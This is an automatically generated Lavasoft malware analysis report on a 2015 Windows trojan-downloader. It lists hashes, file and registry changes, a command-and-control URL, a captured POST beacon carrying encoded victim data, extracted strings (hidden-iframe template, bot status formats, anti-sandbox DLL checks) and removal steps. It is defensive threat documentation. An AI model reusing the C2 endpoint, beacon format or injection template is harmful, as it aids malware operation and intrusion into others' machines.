Trojan.GenericKD.2070492_36b45e5bfb

by malwarelabrobot on January 16th, 2015 in Malware Descriptions.

Trojan.Win32.Inject.sbkt (Kaspersky), Trojan.GenericKD.2070492 (AdAware), TrojanLoadMoney.YR, TrojanDownloaderVundo.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 36b45e5bfb2a8948516251a93752d081
SHA1: 53d77e6dbda8673080f0afbbc9b86cea4fc509d7
SHA256: e9b7f72295578608508ba8ae5df42f9b81f9b1f3139d9264e46d5fd00f286988
SSDeep: 3072:VwJ52Y7ZoH5XJacW4d1VCoiP5lIuKWc7UJYzxj8CSTn:VwHysrwiH4CYz3STn
Size: 110437 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-05-11 23:03:30
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:2040

The Trojan injects its code into the following process(es):

%original file name%.exe:844

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:844 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\config\software (402 bytes)
%System%\config\SOFTWARE.LOG (1603 bytes)

The Trojan deletes the following file(s):

%WinDir%\306197153\ADService (0 bytes)

The process %original file name%.exe:2040 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp\concierges.dll (2484 bytes)
%Documents and Settings%\%current user%\Application Data\gambesons.x (1568 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp\concierges.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp (0 bytes)

Registry activity

The process %original file name%.exe:844 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 C7 D7 4B 39 B7 AB 20 CE 82 7B 0B 18 D7 B3 0F"

The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"*306197153"

The process %original file name%.exe:2040 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BC 49 B8 A2 F0 51 8E 0A A9 9F DE B5 2D 4B 8F B1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: NirSoft
Product Name: DownTester
Product Version: 1.25.10.3
Legal Copyright: Copyright (c) 2009 - 2010 Nir Sofer
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.25.10.3
File Description: DownTester
Comments:
Language: English (United States)

PE Sections

Name    Virtual Address  Virtual Size  Raw Size  Entropy  Section MD5
.text   4096             23144         23552     4.4491   e50f4a1111bafdc813b1f7ec153b8ea9
.rdata  28672            4558          4608      3.62903  640f709ec19b4ed0455a4c64e5934d5e
.data   36864            108472        1024      3.37648  54c75104a38a6f79dc7a8d3b020a9139
.ndata  147456           32768         0         0        d41d8cd98f00b204e9800998ecf8427e
.rsrc   180224           7336          7680      2.89384  97ee6ff03cc1ffae2acfafbd13faf3dc

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://23.228.100.130/~vpnmaste/panel/gate.php
hxxp://23.228.100.130:80/~vpnmaste/panel/gate.php


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

POST /~vpnmaste/panel/gate.php HTTP/1.1
Host: 23.228.100.130:80
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 468

a=bW5raGlmY3pheHVyc3BldmR5dHFsZ2J3b2o6Z2RlYnl2d3Rxcm9saWphdXBtaHpmY3hza24=&b=vHR5wGU6x25vZXbfY3r1qWQ6MTE4YtA0YtA3NtQ1NDErMWUmYTcrYTbeODA2ZDYrNtI2OTZgvHBmqXY6YWRhqW58YXJnqDj4ODZ8Z2VoZDjeZXNlpG9svGNuwgVtOnF8x3M6V19YUHr2ZXI6pnEoMC44vG5fpDk0LnB8xgV3OnF8&c=ijggdddabbyyvvwtttqqnnol
HTTP/1.1 404 Not Found
Date: Thu, 15 Jan 2015 00:22:36 GMT
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Accept-Ranges: bytes
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

%original file name%.exe_844:

libgcj-13.dll
Mozilla/4.0 (compatible)
%s--%s
%s\B%i.tmp
http.
hXXp://
hXXps://
%y%m%d
%s:%i
%s\browser%li.html
<meta http-equiv="refresh" content="%i">
%s "%s"
Software\Microsoft\Windows NT\CurrentVersion\Windows\load
%s\%s.exe
Software\Microsoft\WindowsNT\CurrentVersion\SystemRestore
NoWindowsUpdate
%s@%s
%s\I%li.bat
%s\U%li.bat
%s\Google\Chrome\Application\chrome.exe
%s\Internet Explorer\iexplore.exe
%s\Opera\opera.exe
%s\Mozilla Firefox\firefox.exe
%s\Maxthon3\Bin\Maxthon.exe
Google Chrome
Opera
Firefox
chrome.exe
opera.exe
firefox.exe
iexplore.exe
Maxthon.exe
%s(%s)
|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|new:
|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|
%s%s%i%s%s%s%s%s
%s:%s
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
|type:response|uid:%s|taskid:%i|return:%s|busy:%s|
autoruns.exe
explorer.exe
SbieDll.dll
snxhk.dll
dbghelp.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion
76487-640-1457236-23837
76487-644-3177037-23510
55274-640-2673064-23950
76497-640-6308873-23835
Windows Task Manager
%s %i %i
.hidden
filesearch.stop
%s@%s:%i
%s\System32\drivers\etc\protocol
%s\Microsoft.NET\Framework\
v4.0.30319
v2.0.50727
\explorer.exe
HTTP/1.
text/html, application/xml;q=0.9, application/xhtml xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
application/x-www-form-urlencoded
HTTP/1.
dnsapi.dll
%s & %s
Software\Microsoft\Windows\CurrentVersion\
\Microsoft\Windows
%s%s%s%s%i%s%s
:Zone.Identifier
%s\K%li.bat
document.write(unescape('%s'));
<iframe src="%s" width="0" height="0" frameborder="0"></iframe>
operator
operator
global constructors keyed to
global destructors keyed to
operator""
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
fc_key
use_fc_key
hXXp://23.228.100.130/~vpnmaste/panel/gate.php
v1.0.8
~vpnmaste/panel/gate.php
23.228.100.130
%WinDir%
%Program Files%
%Documents and Settings%\All Users
%Documents and Settings%\%current user%
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Start Menu\Programs\Startup
%Documents and Settings%\All Users\Start Menu\Programs\Startup
%Program Files%\Internet Explorer\iexplore.exe
%Program Files%\Opera\opera.exe
%Program Files%\Mozilla Firefox\firefox.exe
%Program Files%\Maxthon3\Bin\Maxthon.exe
e.exe
ull)OaJTKCDfzKhXXp://23.228.100.130/~vpnmaste/panel/gate.php80buJEAmbGSSv1.0.8
306197153
c:\%original file name%.exe
%WinDir%\306197153
%WinDir%\306197153\ADService
NICK
JOIN
PRIVMSG
GetProcessHeap
RegCloseKey
RegCreateKeyExA
RegFlushKey
RegOpenKeyExA
ShellExecuteA
InternetOpenUrlA
.text
P`.data
.rdata
`@.eh_fram
.idata
VXa# %D
&%spie);
.kedD
.CRT 
KERNEL32.DLL
ADVAPI32.DLL
msvcrt.dll
SHELL32.DLL
USER32.dll
WININET.DLL
Okernel32.dll
advapi32.dll
Aicmp.dll
surlmon.dll
gws2_32.dll
rpcrt4.dll

%original file name%.exe_844_rwx_00400000_00087000:

(The strings recovered from this memory region are identical to those listed above for %original file name%.exe_844.)


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:2040

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %System%\config\software (402 bytes)
    %System%\config\SOFTWARE.LOG (1603 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp\concierges.dll (2484 bytes)
    %Documents and Settings%\%current user%\Application Data\gambesons.x (1568 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
